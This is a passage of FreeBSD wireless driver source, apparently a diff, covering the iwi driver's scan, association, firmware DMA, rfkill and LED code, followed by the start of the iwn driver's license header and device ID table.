IWI_CMD_ENABLE, NULL, 0); } static __inline void set_scan_type(struct iwi_scan_ext *scan, int ix, int scan_type) { uint8_t *st = &scan->scan_type[ix / 2]; if (ix % 2) *st = (*st & 0xf0) | ((scan_type & 0xf) << 0); else *st = (*st & 0x0f) | ((scan_type & 0xf) << 4); } static int scan_type(const struct ieee80211_scan_state *ss, const struct ieee80211_channel *chan) { /* We can only set one essid for a directed scan */ if (ss->ss_nssid != 0) return IWI_SCAN_TYPE_BDIRECTED; if ((ss->ss_flags & IEEE80211_SCAN_ACTIVE) && (chan->ic_flags & IEEE80211_CHAN_PASSIVE) == 0) return IWI_SCAN_TYPE_BROADCAST; return IWI_SCAN_TYPE_PASSIVE; } static __inline int scan_band(const struct ieee80211_channel *c) { return IEEE80211_IS_CHAN_5GHZ(c) ? IWI_CHAN_5GHZ : IWI_CHAN_2GHZ; } static void iwi_monitor_scan(void *arg, int npending) { struct iwi_softc *sc = arg; IWI_LOCK_DECL; IWI_LOCK(sc); (void) iwi_scanchan(sc, 2000, 0); IWI_UNLOCK(sc); } /* * Start a scan on the current channel or all channels. */ static int iwi_scanchan(struct iwi_softc *sc, unsigned long maxdwell, int allchan) { struct ieee80211com *ic; struct ieee80211_channel *chan; struct ieee80211_scan_state *ss; struct iwi_scan_ext scan; int error = 0; IWI_LOCK_ASSERT(sc); if (sc->fw_state == IWI_FW_SCANNING) { /* * This should not happen as we only trigger scan_next after * completion */ DPRINTF(("%s: called too early - still scanning\n", __func__)); return (EBUSY); } IWI_STATE_BEGIN(sc, IWI_FW_SCANNING); ic = sc->sc_ifp->if_l2com; ss = ic->ic_scan; memset(&scan, 0, sizeof scan); scan.full_scan_index = htole32(++sc->sc_scangen); scan.dwell_time[IWI_SCAN_TYPE_PASSIVE] = htole16(maxdwell); if (ic->ic_flags_ext & IEEE80211_FEXT_BGSCAN) { /* * Use very short dwell times for when we send probe request * frames. Without this bg scans hang. Ideally this should * be handled with early-termination as done by net80211 but * that's not feasible (aborting a scan is problematic). */ scan.dwell_time[IWI_SCAN_TYPE_BROADCAST] = htole16(30); scan.dwell_time[IWI_SCAN_TYPE_BDIRECTED] = htole16(30); } else { scan.dwell_time[IWI_SCAN_TYPE_BROADCAST] = htole16(maxdwell); scan.dwell_time[IWI_SCAN_TYPE_BDIRECTED] = htole16(maxdwell); } /* We can only set one essid for a directed scan */ if (ss->ss_nssid != 0) { error = iwi_cmd(sc, IWI_CMD_SET_ESSID, ss->ss_ssid[0].ssid, ss->ss_ssid[0].len); if (error) return (error); } if (allchan) { int i, next, band, b, bstart; /* * Convert scan list to run-length encoded channel list * the firmware requires (preserving the order setup by * net80211). The first entry in each run specifies the * band and the count of items in the run. */ next = 0; /* next open slot */ bstart = 0; /* NB: not needed, silence compiler */ band = -1; /* NB: impossible value */ KASSERT(ss->ss_last > 0, ("no channels")); for (i = 0; i < ss->ss_last; i++) { chan = ss->ss_chans[i]; b = scan_band(chan); if (b != band) { if (band != -1) scan.channels[bstart] = (next - bstart) | band; /* NB: this allocates a slot for the run-len */ band = b, bstart = next++; } if (next >= IWI_SCAN_CHANNELS) { DPRINTF(("truncating scan list\n")); break; } scan.channels[next] = ieee80211_chan2ieee(ic, chan); set_scan_type(&scan, next, scan_type(ss, chan)); next++; } scan.channels[bstart] = (next - bstart) | band; } else { /* Scan the current channel only */ chan = ic->ic_curchan; scan.channels[0] = 1 | scan_band(chan); scan.channels[1] = ieee80211_chan2ieee(ic, chan); set_scan_type(&scan, 1, scan_type(ss, chan)); } #ifdef IWI_DEBUG if (iwi_debug > 0) { static const char *scantype[8] = { "PSTOP", "PASV", "DIR", "BCAST", "BDIR", "5", "6", "7" }; int i; printf("Scan request: index %u dwell %d/%d/%d\n" , le32toh(scan.full_scan_index) , le16toh(scan.dwell_time[IWI_SCAN_TYPE_PASSIVE]) , le16toh(scan.dwell_time[IWI_SCAN_TYPE_BROADCAST]) , le16toh(scan.dwell_time[IWI_SCAN_TYPE_BDIRECTED]) ); i = 0; do { int run = scan.channels[i]; if (run == 0) break; printf("Scan %d %s channels:", run & 0x3f, run & IWI_CHAN_2GHZ ? "2.4GHz" : "5GHz"); for (run &= 0x3f, i++; run > 0; run--, i++) { uint8_t type = scan.scan_type[i/2]; printf(" %u/%s", scan.channels[i], scantype[(i & 1 ? type : type>>4) & 7]); } printf("\n"); } while (i < IWI_SCAN_CHANNELS); } #endif return (iwi_cmd(sc, IWI_CMD_SCAN_EXT, &scan, sizeof scan)); } static int iwi_set_sensitivity(struct iwi_softc *sc, int8_t rssi_dbm) { struct iwi_sensitivity sens; DPRINTF(("Setting sensitivity to %d\n", rssi_dbm)); memset(&sens, 0, sizeof sens); sens.rssi = htole16(rssi_dbm); return iwi_cmd(sc, IWI_CMD_SET_SENSITIVITY, &sens, sizeof sens); } static int iwi_auth_and_assoc(struct iwi_softc *sc, struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = vap->iv_ifp; struct ieee80211_node *ni; struct iwi_configuration config; struct iwi_associate *assoc = &sc->assoc; struct iwi_rateset rs; uint16_t capinfo; uint32_t data; int error, mode; IWI_LOCK_ASSERT(sc); ni = ieee80211_ref_node(vap->iv_bss); if (sc->flags & IWI_FLAG_ASSOCIATED) { DPRINTF(("Already associated\n")); return (-1); } IWI_STATE_BEGIN(sc, IWI_FW_ASSOCIATING); error = 0; mode = 0; if (IEEE80211_IS_CHAN_A(ic->ic_curchan)) mode = IWI_MODE_11A; else if (IEEE80211_IS_CHAN_G(ic->ic_curchan)) mode = IWI_MODE_11G; if (IEEE80211_IS_CHAN_B(ic->ic_curchan)) mode = IWI_MODE_11B; if (IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { memset(&config, 0, sizeof config); config.bluetooth_coexistence = sc->bluetooth; config.antenna = sc->antenna; config.multicast_enabled = 1; if (mode == IWI_MODE_11G) config.use_protection = 1; config.answer_pbreq = (vap->iv_opmode == IEEE80211_M_IBSS) ? 1 : 0; config.disable_unicast_decryption = 1; config.disable_multicast_decryption = 1; DPRINTF(("Configuring adapter\n")); error = iwi_cmd(sc, IWI_CMD_SET_CONFIG, &config, sizeof config); if (error != 0) goto done; } #ifdef IWI_DEBUG if (iwi_debug > 0) { printf("Setting ESSID to "); ieee80211_print_essid(ni->ni_essid, ni->ni_esslen); printf("\n"); } #endif error = iwi_cmd(sc, IWI_CMD_SET_ESSID, ni->ni_essid, ni->ni_esslen); if (error != 0) goto done; error = iwi_setpowermode(sc, vap); if (error != 0) goto done; data = htole32(vap->iv_rtsthreshold); DPRINTF(("Setting RTS threshold to %u\n", le32toh(data))); error = iwi_cmd(sc, IWI_CMD_SET_RTS_THRESHOLD, &data, sizeof data); if (error != 0) goto done; data = htole32(vap->iv_fragthreshold); DPRINTF(("Setting fragmentation threshold to %u\n", le32toh(data))); error = iwi_cmd(sc, IWI_CMD_SET_FRAG_THRESHOLD, &data, sizeof data); if (error != 0) goto done; /* the rate set has already been "negotiated" */ memset(&rs, 0, sizeof rs); rs.mode = mode; rs.type = IWI_RATESET_TYPE_NEGOTIATED; rs.nrates = ni->ni_rates.rs_nrates; if (rs.nrates > IWI_RATESET_SIZE) { DPRINTF(("Truncating negotiated rate set from %u\n", rs.nrates)); rs.nrates = IWI_RATESET_SIZE; } memcpy(rs.rates, ni->ni_rates.rs_rates, rs.nrates); DPRINTF(("Setting negotiated rates (%u)\n", rs.nrates)); error = iwi_cmd(sc, IWI_CMD_SET_RATES, &rs, sizeof rs); if (error != 0) goto done; memset(assoc, 0, sizeof *assoc); if ((vap->iv_flags & IEEE80211_F_WME) && ni->ni_ies.wme_ie != NULL) { /* NB: don't treat WME setup as failure */ if (iwi_wme_setparams(sc, ic) == 0 && iwi_wme_setie(sc) == 0) assoc->policy |= htole16(IWI_POLICY_WME); /* XXX complain on failure? */ } if (vap->iv_appie_wpa != NULL) { struct ieee80211_appie *ie = vap->iv_appie_wpa; DPRINTF(("Setting optional IE (len=%u)\n", ie->ie_len)); error = iwi_cmd(sc, IWI_CMD_SET_OPTIE, ie->ie_data, ie->ie_len); if (error != 0) goto done; } error = iwi_set_sensitivity(sc, ic->ic_node_getrssi(ni)); if (error != 0) goto done; assoc->mode = mode; assoc->chan = ic->ic_curchan->ic_ieee; /* * NB: do not arrange for shared key auth w/o privacy * (i.e. a wep key); it causes a firmware error. */ if ((vap->iv_flags & IEEE80211_F_PRIVACY) && ni->ni_authmode == IEEE80211_AUTH_SHARED) { assoc->auth = IWI_AUTH_SHARED; /* * It's possible to have privacy marked but no default * key setup. This typically is due to a user app bug * but if we blindly grab the key the firmware will * barf so avoid it for now. */ if (vap->iv_def_txkey != IEEE80211_KEYIX_NONE) assoc->auth |= vap->iv_def_txkey << 4; error = iwi_setwepkeys(sc, vap); if (error != 0) goto done; } if (vap->iv_flags & IEEE80211_F_WPA) assoc->policy |= htole16(IWI_POLICY_WPA); if (vap->iv_opmode == IEEE80211_M_IBSS && ni->ni_tstamp.tsf == 0) assoc->type = IWI_HC_IBSS_START; else assoc->type = IWI_HC_ASSOC; memcpy(assoc->tstamp, ni->ni_tstamp.data, 8); if (vap->iv_opmode == IEEE80211_M_IBSS) capinfo = IEEE80211_CAPINFO_IBSS; else capinfo = IEEE80211_CAPINFO_ESS; if (vap->iv_flags & IEEE80211_F_PRIVACY) capinfo |= IEEE80211_CAPINFO_PRIVACY; if ((ic->ic_flags & IEEE80211_F_SHPREAMBLE) && IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) capinfo |= IEEE80211_CAPINFO_SHORT_PREAMBLE; if (ni->ni_capinfo & IEEE80211_CAPINFO_SHORT_SLOTTIME) capinfo |= IEEE80211_CAPINFO_SHORT_SLOTTIME; assoc->capinfo = htole16(capinfo); assoc->lintval = htole16(ic->ic_lintval); assoc->intval = htole16(ni->ni_intval); IEEE80211_ADDR_COPY(assoc->bssid, ni->ni_bssid); if (vap->iv_opmode == IEEE80211_M_IBSS) IEEE80211_ADDR_COPY(assoc->dst, ifp->if_broadcastaddr); else IEEE80211_ADDR_COPY(assoc->dst, ni->ni_bssid); DPRINTF(("%s bssid %6D dst %6D channel %u policy 0x%x " "auth %u capinfo 0x%x lintval %u bintval %u\n", assoc->type == IWI_HC_IBSS_START ? "Start" : "Join", assoc->bssid, ":", assoc->dst, ":", assoc->chan, le16toh(assoc->policy), assoc->auth, le16toh(assoc->capinfo), le16toh(assoc->lintval), le16toh(assoc->intval))); error = iwi_cmd(sc, IWI_CMD_ASSOCIATE, assoc, sizeof *assoc); done: ieee80211_free_node(ni); if (error) IWI_STATE_END(sc, IWI_FW_ASSOCIATING); return (error); } static void iwi_disassoc(void *arg, int pending) { struct iwi_softc *sc = arg; IWI_LOCK_DECL; IWI_LOCK(sc); iwi_disassociate(sc, 0); IWI_UNLOCK(sc); } static int iwi_disassociate(struct iwi_softc *sc, int quiet) { struct iwi_associate *assoc = &sc->assoc; if ((sc->flags & IWI_FLAG_ASSOCIATED) == 0) { DPRINTF(("Not associated\n")); return (-1); } IWI_STATE_BEGIN(sc, IWI_FW_DISASSOCIATING); if (quiet) assoc->type = IWI_HC_DISASSOC_QUIET; else assoc->type = IWI_HC_DISASSOC; DPRINTF(("Trying to disassociate from %6D channel %u\n", assoc->bssid, ":", assoc->chan)); return iwi_cmd(sc, IWI_CMD_ASSOCIATE, assoc, sizeof *assoc); } /* * release dma resources for the firmware */ static void iwi_release_fw_dma(struct iwi_softc *sc) { if (sc->fw_flags & IWI_FW_HAVE_PHY) bus_dmamap_unload(sc->fw_dmat, sc->fw_map); if (sc->fw_flags & IWI_FW_HAVE_MAP) bus_dmamem_free(sc->fw_dmat, sc->fw_virtaddr, sc->fw_map); if (sc->fw_flags & IWI_FW_HAVE_DMAT) bus_dma_tag_destroy(sc->fw_dmat); sc->fw_flags = 0; sc->fw_dma_size = 0; sc->fw_dmat = NULL; sc->fw_map = NULL; sc->fw_physaddr = 0; sc->fw_virtaddr = NULL; } /* * allocate the dma descriptor for the firmware. * Return 0 on success, 1 on error. * Must be called unlocked, protected by IWI_FLAG_FW_LOADING. */ static int iwi_init_fw_dma(struct iwi_softc *sc, int size) { if (sc->fw_dma_size >= size) return 0; if (bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 4, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, size, 1, size, 0, NULL, NULL, &sc->fw_dmat) != 0) { device_printf(sc->sc_dev, "could not create firmware DMA tag\n"); goto error; } sc->fw_flags |= IWI_FW_HAVE_DMAT; if (bus_dmamem_alloc(sc->fw_dmat, &sc->fw_virtaddr, 0, &sc->fw_map) != 0) { device_printf(sc->sc_dev, "could not allocate firmware DMA memory\n"); goto error; } sc->fw_flags |= IWI_FW_HAVE_MAP; if (bus_dmamap_load(sc->fw_dmat, sc->fw_map, sc->fw_virtaddr, size, iwi_dma_map_addr, &sc->fw_physaddr, 0) != 0) { device_printf(sc->sc_dev, "could not load firmware DMA map\n"); goto error; } sc->fw_flags |= IWI_FW_HAVE_PHY; sc->fw_dma_size = size; return 0; error: iwi_release_fw_dma(sc); return 1; } static void iwi_init_locked(struct iwi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct iwi_rx_data *data; int i; IWI_LOCK_ASSERT(sc); if (sc->fw_state == IWI_FW_LOADING) { device_printf(sc->sc_dev, "%s: already loading\n", __func__); return; /* XXX: condvar? */ } iwi_stop_locked(sc); IWI_STATE_BEGIN(sc, IWI_FW_LOADING); if (iwi_reset(sc) != 0) { device_printf(sc->sc_dev, "could not reset adapter\n"); goto fail; } if (iwi_load_firmware(sc, &sc->fw_boot) != 0) { device_printf(sc->sc_dev, "could not load boot firmware %s\n", sc->fw_boot.name); goto fail; } if (iwi_load_ucode(sc, &sc->fw_uc) != 0) { device_printf(sc->sc_dev, "could not load microcode %s\n", sc->fw_uc.name); goto fail; } iwi_stop_master(sc); CSR_WRITE_4(sc, IWI_CSR_CMD_BASE, sc->cmdq.physaddr); CSR_WRITE_4(sc, IWI_CSR_CMD_SIZE, sc->cmdq.count); CSR_WRITE_4(sc, IWI_CSR_CMD_WIDX, sc->cmdq.cur); CSR_WRITE_4(sc, IWI_CSR_TX1_BASE, sc->txq[0].physaddr); CSR_WRITE_4(sc, IWI_CSR_TX1_SIZE, sc->txq[0].count); CSR_WRITE_4(sc, IWI_CSR_TX1_WIDX, sc->txq[0].cur); CSR_WRITE_4(sc, IWI_CSR_TX2_BASE, sc->txq[1].physaddr); CSR_WRITE_4(sc, IWI_CSR_TX2_SIZE, sc->txq[1].count); CSR_WRITE_4(sc, IWI_CSR_TX2_WIDX, sc->txq[1].cur); CSR_WRITE_4(sc, IWI_CSR_TX3_BASE, sc->txq[2].physaddr); CSR_WRITE_4(sc, IWI_CSR_TX3_SIZE, sc->txq[2].count); CSR_WRITE_4(sc, IWI_CSR_TX3_WIDX, sc->txq[2].cur); CSR_WRITE_4(sc, IWI_CSR_TX4_BASE, sc->txq[3].physaddr); CSR_WRITE_4(sc, IWI_CSR_TX4_SIZE, sc->txq[3].count); CSR_WRITE_4(sc, IWI_CSR_TX4_WIDX, sc->txq[3].cur); for (i = 0; i < sc->rxq.count; i++) { data = &sc->rxq.data[i]; CSR_WRITE_4(sc, data->reg, data->physaddr); } CSR_WRITE_4(sc, IWI_CSR_RX_WIDX, sc->rxq.count - 1); if (iwi_load_firmware(sc, &sc->fw_fw) != 0) { device_printf(sc->sc_dev, "could not load main firmware %s\n", sc->fw_fw.name); goto fail; } sc->flags |= IWI_FLAG_FW_INITED; IWI_STATE_END(sc, IWI_FW_LOADING); if (iwi_config(sc) != 0) { device_printf(sc->sc_dev, "unable to enable adapter\n"); goto fail2; } callout_reset(&sc->sc_wdtimer, hz, iwi_watchdog, sc); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; return; fail: IWI_STATE_END(sc, IWI_FW_LOADING); fail2: iwi_stop_locked(sc); } static void iwi_init(void *priv) { struct iwi_softc *sc = priv; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; IWI_LOCK_DECL; IWI_LOCK(sc); iwi_init_locked(sc); IWI_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); } static void iwi_stop_locked(void *priv) { struct iwi_softc *sc = priv; struct ifnet *ifp = sc->sc_ifp; IWI_LOCK_ASSERT(sc); ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); if (sc->sc_softled) { callout_stop(&sc->sc_ledtimer); sc->sc_blinking = 0; } callout_stop(&sc->sc_wdtimer); callout_stop(&sc->sc_rftimer); iwi_stop_master(sc); CSR_WRITE_4(sc, IWI_CSR_RST, IWI_RST_SOFT_RESET); /* reset rings */ iwi_reset_cmd_ring(sc, &sc->cmdq); iwi_reset_tx_ring(sc, &sc->txq[0]); iwi_reset_tx_ring(sc, &sc->txq[1]); iwi_reset_tx_ring(sc, &sc->txq[2]); iwi_reset_tx_ring(sc, &sc->txq[3]); iwi_reset_rx_ring(sc, &sc->rxq); sc->sc_tx_timer = 0; sc->sc_state_timer = 0; sc->sc_busy_timer = 0; sc->flags &= ~(IWI_FLAG_BUSY | IWI_FLAG_ASSOCIATED); sc->fw_state = IWI_FW_IDLE; wakeup(sc); } static void iwi_stop(struct iwi_softc *sc) { IWI_LOCK_DECL; IWI_LOCK(sc); iwi_stop_locked(sc); IWI_UNLOCK(sc); } static void iwi_restart(void *arg, int npending) { struct iwi_softc *sc = arg; iwi_init(sc); } /* * Return whether or not the radio is enabled in hardware * (i.e. the rfkill switch is "off"). */ static int iwi_getrfkill(struct iwi_softc *sc) { return (CSR_READ_4(sc, IWI_CSR_IO) & IWI_IO_RADIO_ENABLED) == 0; } static void iwi_radio_on(void *arg, int pending) { struct iwi_softc *sc = arg; struct ieee80211com *ic = sc->sc_ifp->if_l2com; device_printf(sc->sc_dev, "radio turned on\n"); iwi_init(sc); ieee80211_notify_radio(ic, 1); } static void iwi_rfkill_poll(void *arg) { struct iwi_softc *sc = arg; IWI_LOCK_ASSERT(sc); /* * Check for a change in rfkill state. We get an * interrupt when a radio is disabled but not when * it is enabled so we must poll for the latter. */ if (!iwi_getrfkill(sc)) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; ieee80211_runtask(ic, &sc->sc_radiontask); return; } callout_reset(&sc->sc_rftimer, 2*hz, iwi_rfkill_poll, sc); } static void iwi_radio_off(void *arg, int pending) { struct iwi_softc *sc = arg; struct ieee80211com *ic = sc->sc_ifp->if_l2com; IWI_LOCK_DECL; device_printf(sc->sc_dev, "radio turned off\n"); ieee80211_notify_radio(ic, 0); IWI_LOCK(sc); iwi_stop_locked(sc); iwi_rfkill_poll(sc); IWI_UNLOCK(sc); } static int iwi_sysctl_stats(SYSCTL_HANDLER_ARGS) { struct iwi_softc *sc = arg1; uint32_t size, buf[128]; memset(buf, 0, sizeof buf); if (!(sc->flags & IWI_FLAG_FW_INITED)) return SYSCTL_OUT(req, buf, sizeof buf); size = min(CSR_READ_4(sc, IWI_CSR_TABLE0_SIZE), 128 - 1); CSR_READ_REGION_4(sc, IWI_CSR_TABLE0_BASE, &buf[1], size); return SYSCTL_OUT(req, buf, size); } static int iwi_sysctl_radio(SYSCTL_HANDLER_ARGS) { struct iwi_softc *sc = arg1; int val = !iwi_getrfkill(sc); return SYSCTL_OUT(req, &val, sizeof val); } /* * Add sysctl knobs. */ static void iwi_sysctlattach(struct iwi_softc *sc) { struct sysctl_ctx_list *ctx = device_get_sysctl_ctx(sc->sc_dev); struct sysctl_oid *tree = device_get_sysctl_tree(sc->sc_dev); SYSCTL_ADD_PROC(ctx, SYSCTL_CHILDREN(tree), OID_AUTO, "radio", CTLTYPE_INT | CTLFLAG_RD, sc, 0, iwi_sysctl_radio, "I", "radio transmitter switch state (0=off, 1=on)"); SYSCTL_ADD_PROC(ctx, SYSCTL_CHILDREN(tree), OID_AUTO, "stats", CTLTYPE_OPAQUE | CTLFLAG_RD, sc, 0, iwi_sysctl_stats, "S", "statistics"); sc->bluetooth = 0; SYSCTL_ADD_INT(ctx, SYSCTL_CHILDREN(tree), OID_AUTO, "bluetooth", CTLFLAG_RW, &sc->bluetooth, 0, "bluetooth coexistence"); sc->antenna = IWI_ANTENNA_AUTO; SYSCTL_ADD_INT(ctx, SYSCTL_CHILDREN(tree), OID_AUTO, "antenna", CTLFLAG_RW, &sc->antenna, 0, "antenna (0=auto)"); } /* * LED support. * * Different cards have different capabilities. Some have three * led's while others have only one. The linux ipw driver defines * led's for link state (associated or not), band (11a, 11g, 11b), * and for link activity. We use one led and vary the blink rate * according to the tx/rx traffic a la the ath driver. */ static __inline uint32_t iwi_toggle_event(uint32_t r) { return r &~ (IWI_RST_STANDBY | IWI_RST_GATE_ODMA | IWI_RST_GATE_IDMA | IWI_RST_GATE_ADMA); } static uint32_t iwi_read_event(struct iwi_softc *sc) { return MEM_READ_4(sc, IWI_MEM_EEPROM_EVENT); } static void iwi_write_event(struct iwi_softc *sc, uint32_t v) { MEM_WRITE_4(sc, IWI_MEM_EEPROM_EVENT, v); } static void iwi_led_done(void *arg) { struct iwi_softc *sc = arg; sc->sc_blinking = 0; } /* * Turn the activity LED off: flip the pin and then set a timer so no * update will happen for the specified duration. */ static void iwi_led_off(void *arg) { struct iwi_softc *sc = arg; uint32_t v; v = iwi_read_event(sc); v &= ~sc->sc_ledpin; iwi_write_event(sc, iwi_toggle_event(v)); callout_reset(&sc->sc_ledtimer, sc->sc_ledoff, iwi_led_done, sc); } /* * Blink the LED according to the specified on/off times. */ static void iwi_led_blink(struct iwi_softc *sc, int on, int off) { uint32_t v; v = iwi_read_event(sc); v |= sc->sc_ledpin; iwi_write_event(sc, iwi_toggle_event(v)); sc->sc_blinking = 1; sc->sc_ledoff = off; callout_reset(&sc->sc_ledtimer, on, iwi_led_off, sc); } static void iwi_led_event(struct iwi_softc *sc, int event) { #define N(a) (sizeof(a)/sizeof(a[0])) /* NB: on/off times from the Atheros NDIS driver, w/ permission */ static const struct { u_int rate; /* tx/rx iwi rate */ u_int16_t timeOn; /* LED on time (ms) */ u_int16_t timeOff; /* LED off time (ms) */ } blinkrates[] = { { IWI_RATE_OFDM54, 40, 10 }, { IWI_RATE_OFDM48, 44, 11 }, { IWI_RATE_OFDM36, 50, 13 }, { IWI_RATE_OFDM24, 57, 14 }, { IWI_RATE_OFDM18, 67, 16 }, { IWI_RATE_OFDM12, 80, 20 }, { IWI_RATE_DS11, 100, 25 }, { IWI_RATE_OFDM9, 133, 34 }, { IWI_RATE_OFDM6, 160, 40 }, { IWI_RATE_DS5, 200, 50 }, { 6, 240, 58 }, /* XXX 3Mb/s if it existed */ { IWI_RATE_DS2, 267, 66 }, { IWI_RATE_DS1, 400, 100 }, { 0, 500, 130 }, /* unknown rate/polling */ }; uint32_t txrate; int j = 0; /* XXX silence compiler */ sc->sc_ledevent = ticks; /* time of last event */ if (sc->sc_blinking) /* don't interrupt active blink */ return; switch (event) { case IWI_LED_POLL: j = N(blinkrates)-1; break; case IWI_LED_TX: /* read current transmission rate from adapter */ txrate = CSR_READ_4(sc, IWI_CSR_CURRENT_TX_RATE); if (blinkrates[sc->sc_txrix].rate != txrate) { for (j = 0; j < N(blinkrates)-1; j++) if (blinkrates[j].rate == txrate) break; sc->sc_txrix = j; } else j = sc->sc_txrix; break; case IWI_LED_RX: if (blinkrates[sc->sc_rxrix].rate != sc->sc_rxrate) { for (j = 0; j < N(blinkrates)-1; j++) if (blinkrates[j].rate == sc->sc_rxrate) break; sc->sc_rxrix = j; } else j = sc->sc_rxrix; break; } /* XXX beware of overflow */ iwi_led_blink(sc, (blinkrates[j].timeOn * hz) / 1000, (blinkrates[j].timeOff * hz) / 1000); #undef N } static int iwi_sysctl_softled(SYSCTL_HANDLER_ARGS) { struct iwi_softc *sc = arg1; int softled = sc->sc_softled; int error; error = sysctl_handle_int(oidp, &softled, 0, req); if (error || !req->newptr) return error; softled = (softled != 0); if (softled != sc->sc_softled) { if (softled) { uint32_t v = iwi_read_event(sc); v &= ~sc->sc_ledpin; iwi_write_event(sc, iwi_toggle_event(v)); } sc->sc_softled = softled; } return 0; } static void iwi_ledattach(struct iwi_softc *sc) { struct sysctl_ctx_list *ctx = device_get_sysctl_ctx(sc->sc_dev); struct sysctl_oid *tree = device_get_sysctl_tree(sc->sc_dev); sc->sc_blinking = 0; sc->sc_ledstate = 1; sc->sc_ledidle = (2700*hz)/1000; /* 2.7sec */ callout_init_mtx(&sc->sc_ledtimer, &sc->sc_mtx, 0); SYSCTL_ADD_PROC(ctx, SYSCTL_CHILDREN(tree), OID_AUTO, "softled", CTLTYPE_INT | CTLFLAG_RW, sc, 0, iwi_sysctl_softled, "I", "enable/disable software LED support"); SYSCTL_ADD_UINT(ctx, SYSCTL_CHILDREN(tree), OID_AUTO, "ledpin", CTLFLAG_RW, &sc->sc_ledpin, 0, "pin setting to turn activity LED on"); SYSCTL_ADD_UINT(ctx, SYSCTL_CHILDREN(tree), OID_AUTO, "ledidle", CTLFLAG_RW, &sc->sc_ledidle, 0, "idle time for inactivity LED (ticks)"); /* XXX for debugging */ SYSCTL_ADD_UINT(ctx, SYSCTL_CHILDREN(tree), OID_AUTO, "nictype", CTLFLAG_RD, &sc->sc_nictype, 0, "NIC type from EEPROM"); sc->sc_ledpin = IWI_RST_LED_ACTIVITY; sc->sc_softled = 1; sc->sc_nictype = (iwi_read_prom_word(sc, IWI_EEPROM_NIC) >> 8) & 0xff; if (sc->sc_nictype == 1) { /* * NB: led's are reversed. */ sc->sc_ledpin = IWI_RST_LED_ASSOCIATED; } } static void iwi_scan_start(struct ieee80211com *ic) { /* ignore */ } static void iwi_set_channel(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct iwi_softc *sc = ifp->if_softc; if (sc->fw_state == IWI_FW_IDLE) iwi_setcurchan(sc, ic->ic_curchan->ic_ieee); } static void iwi_scan_curchan(struct ieee80211_scan_state *ss, unsigned long maxdwell) { struct ieee80211vap *vap = ss->ss_vap; struct ifnet *ifp = vap->iv_ic->ic_ifp; struct iwi_softc *sc = ifp->if_softc; IWI_LOCK_DECL; IWI_LOCK(sc); if (iwi_scanchan(sc, maxdwell, 0)) ieee80211_cancel_scan(vap); IWI_UNLOCK(sc); } static void iwi_scan_mindwell(struct ieee80211_scan_state *ss) { /* NB: don't try to abort scan; wait for firmware to finish */ } static void iwi_scan_end(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct iwi_softc *sc = ifp->if_softc; IWI_LOCK_DECL; IWI_LOCK(sc); sc->flags &= ~IWI_FLAG_CHANNEL_SCAN; /* NB: make sure we're still scanning */ if (sc->fw_state == IWI_FW_SCANNING) iwi_cmd(sc, IWI_CMD_ABORT_SCAN, NULL, 0); IWI_UNLOCK(sc); } diff --git a/sys/dev/iwn/if_iwn.c b/sys/dev/iwn/if_iwn.c index 175d4cab8534..1b77157fc9a1 100644 --- a/sys/dev/iwn/if_iwn.c +++ b/sys/dev/iwn/if_iwn.c @@ -1,8591 +1,8591 @@ /*- * Copyright (c) 2007-2009 Damien Bergamini * Copyright (c) 2008 Benjamin Close * Copyright (c) 2008 Sam Leffler, Errno Consulting * Copyright (c) 2011 Intel Corporation * Copyright (c) 2013 Cedric GROSS * Copyright (c) 2013 Adrian Chadd * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ /* * Driver for Intel WiFi Link 4965 and 1000/5000/6000 Series 802.11 network * adapters. */ #include __FBSDID("$FreeBSD$"); #include "opt_wlan.h" #include "opt_iwn.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include struct iwn_ident { uint16_t vendor; uint16_t device; const char *name; }; static const struct iwn_ident iwn_ident_table[] = { { 0x8086, IWN_DID_6x05_1, "Intel Centrino Advanced-N 6205" }, { 0x8086, IWN_DID_1000_1, "Intel Centrino Wireless-N 1000" }, { 0x8086, IWN_DID_1000_2, "Intel Centrino Wireless-N 1000" }, { 0x8086, IWN_DID_6x05_2, "Intel Centrino Advanced-N 6205" }, { 0x8086, IWN_DID_6050_1, "Intel Centrino Advanced-N + WiMAX 6250" }, { 0x8086, IWN_DID_6050_2, "Intel Centrino Advanced-N + WiMAX 6250" }, { 0x8086, IWN_DID_x030_1, "Intel Centrino Wireless-N 1030" }, { 0x8086, IWN_DID_x030_2, "Intel Centrino Wireless-N 1030" }, { 0x8086, IWN_DID_x030_3, "Intel Centrino Advanced-N 6230" }, { 0x8086, IWN_DID_x030_4, "Intel Centrino Advanced-N 6230" }, { 0x8086, IWN_DID_6150_1, "Intel Centrino Wireless-N + WiMAX 6150" }, { 0x8086, IWN_DID_6150_2, "Intel Centrino Wireless-N + WiMAX 6150" }, { 0x8086, 